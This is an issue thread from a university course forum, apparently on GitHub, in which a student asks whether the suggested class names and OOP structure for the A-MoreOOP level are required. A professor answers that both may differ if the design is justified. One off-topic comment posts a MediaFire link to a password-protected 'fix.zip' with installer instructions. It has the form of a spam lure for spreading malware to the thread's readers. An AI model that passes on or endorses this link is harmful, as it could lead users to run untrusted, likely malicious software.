### ISSUE TITLE
OOP Structure for A-MoreOOP

### ISSUE THREAD

**Issue by matthewyip1511** [nus-cs2103-AY2425S1/forum#109]
Hi, I'm currently working on the A-MoreOOP level where the suggested classes to write are Ui, Storage, Parser and TaskList. May I check:

1. Do we have to follow these names exactly?
2. Is it a must to follow this OOP structure, or could a slightly different one work as well?

Thank you!

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by damithc** [comment]
@matthewyip1511 The names can be different. The design can be different too, if you can justify why your design is a good OOP design too.

**Comment by matthewyip1511** [comment]
Got it, thanks Prof!

**Comment by matthewyip1511** [comment]
Question answered by Prof
